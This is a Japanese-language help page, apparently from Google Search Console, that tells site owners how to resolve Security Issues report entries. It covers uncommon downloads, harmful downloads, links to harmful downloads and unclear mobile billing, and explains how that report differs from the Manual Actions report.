サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

一般的ではないダウンロード

Google セーフ ブラウジングにまだ認識されていないコンテンツをサイトが配信しています。Chrome ブラウザで、一般的にダウンロードされておらず危険を及ぼす可能性がある、という警告メッセージが表示されることがあります。これらの警告は、Google セーフ ブラウジングでファイルの安全性が確認できると自動的に消去されます。

1. 問題を修正する

ダウンロードがダウンロードに関するガイドラインに準拠しているかどうかを確認します。このガイドラインに違反しているダウンロードがある場合は、削除します。このガイドラインに違反していない場合は、削除する必要はなく、下記の説明のように審査をリクエストします。なお、この問題については、URL の例が表示されない場合もあります。

2. 再審査をリクエストする

ファイルの削除が完了したら(またはダウンロードがガイドラインに準拠していることを確認したら)、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

有害なダウンロード

Google セーフ ブラウジングマルウェアや望ましくないソフトウェアと認識したコンテンツがサイト上でユーザーに配信されています。ユーザーがサイトにアクセスすると、Chrome ブラウザに警告が表示される可能性があります。警告を削除するには、サイトから該当するダウンロードを削除する必要があります。

1. 問題を評価する

ダウンロードが意図的なものである場合は、サイトから該当するダウンロードを削除して、審査のリクエストに進んでください。

サイトでのダウンロードに気づいていなかった場合は、ハッキングされている可能性があります。ハッキングされたサイトを修正し、ダウンロードを見つけて削除してください。

2. 自分で修正できる問題かどうかを判断する

サポートチームの構築に目を通し、この問題を自分で修正するには何が必要か、自分のスキルでは難しいと思う場合はどのように支援を受けるかをご確認ください。

3. 問題を確認する

サイト上のページの例を表示して、該当するダウンロードの存在を確認します。

4. サイトをクリーンアップする

ハッキングされた場合のガイドを読み、クリーンアップの手順やサイトが再びハッキングされないようにするためのヒントなど、サイトの包括的な修正フローを確認します。サイトをクリーンアップする準備ができたら、影響を受けたファイルを正常な最後のバックアップで置き換えるか、自分でスパムのコンテンツを削除できます。ウィルス対策ソフトウェアを使用して、サイトでホストされているバイナリと他のコンテンツをスキャンします。ウィルス対策ソフトウェアは多種多様なマルウェアや望ましくないソフトウェアを検出しますが、それでもすべての種類を検出することはできません。ソフトウェアをウィルス対策プログラム(または VirusTotal などのウィルス対策統合サービス)に送信すれば、ソフトウェアにおける潜在的な問題の有無を確認できます。Google セーフ ブラウジングでは独自の基準を用いて、プログラムやバイナリが望ましくないソフトウェアやマルウェアに該当するかどうかを判別しています。

5. 修正を確認する

サイトが望ましくないソフトウェアのポリシーに準拠していることを確認します。

6. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

有害なダウンロードへのリンク

Google セーフ ブラウジングによると、マルウェアや望ましくないソフトウェアがダウンロードできるようになっているサイトに自分のサイトがリンクされています。ユーザーがサイトにアクセスすると、Chrome ブラウザに警告が表示される可能性があります。警告を削除するには、有害なサイトへのリンクを削除する必要があります。

1. 問題を評価する

リンクが意図的なものである場合は、サイトから該当するリンクを削除して、審査のリクエストに進んでください。

リンクに気づいていなかった場合は、ハッキングされている可能性があります。

2. 自分で修正できる問題かどうかを判断する

ハッキングされている場合は、サポートチームの構築に目を通し、この問題を自分で修正するには何が必要か、自分のスキルでは難しいと思う場合はどのように支援を受けるかをご確認ください。

3. 問題を確認する

 

サイト上のページの例を表示して、該当するダウンロードの存在を確認します。ハッカーは相手がサイト所有者であると認識すると、こうしたリンクを非表示にすることがあります。そのため、URL 検査ツールを使ってサンプル URL にアクセスしたり、別のアカウントや別のパソコンでログインしてみてください。

4. サイトをクリーンアップする

ハッキングされた場合のガイドを読み、クリーンアップの手順やサイトが再びハッキングされないようにするためのヒントなど、サイトの包括的な修正フローを確認します。サイトをクリーンアップする準備ができたら、影響を受けたファイルを正常な最後のバックアップで置き換えるか、自分でスパムのコンテンツを削除できます。

5. 修正を確認する

サイトが望ましくないソフトウェアのポリシーに準拠していることを確認します。

6. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

不明瞭なモバイル請求

サイトで、モバイル通信料金についてユーザーに十分に通知されていないことが発覚した場合、ユーザーがページを読み込んで料金が発生する前に Chrome が警告を表示することがあります。

1. 問題を確認する

レポートに表示されている URL の例にアクセスして、どのページに不明瞭なモバイル請求の動作があるか確認します。こちらのモバイル請求のガイドラインをご覧ください。

2. 問題を修正する

モバイル請求のおすすめの方法に準拠するようにページを修正します。

3. 再審査をリクエストする

サイトで問題が修正されていることを確認したら、[セキュリティの問題] レポートでセキュリティ審査をリクエストします。審査が完了するまでに数日から数週間かかることがあります。

[手動による対策] レポートと [セキュリティの問題] レポートの違いは何ですか?

[手動による対策] レポートには、ページやサイトに関する問題が一覧表示されます。そのほとんどは Google の検索インデックスを操作しようとするものですが、必ずしもユーザーにとって危険とは限りません。ここに報告されている問題のほとんどは、そのせいでページやサイトの掲載順位が下がったり、検索結果から除外されたりする可能性はありますが、ユーザーが視覚的に識別できるような表示は行われません。

[セキュリティの問題] レポートに一覧表示されるのは、サイトがハッキングされている場合や、サイト上での操作によって訪問者やそのパソコンに危害が及ぶおそれがある場合に報告される問題です。たとえば、フィッシング攻撃、ユーザーのパソコンへのマルウェアや望ましくないソフトウェアのインストールなどが考えられます。こうしたページが検索結果に含まれている場合は、検索結果に警告ラベルが追加されます。ブラウザによっては、ユーザーがそのページにアクセスしようとしたときに、インタースティシャルな警告ページが表示される場合もあります。

この情報は役に立ちましたか?
改善できる点がありましたらお聞かせください。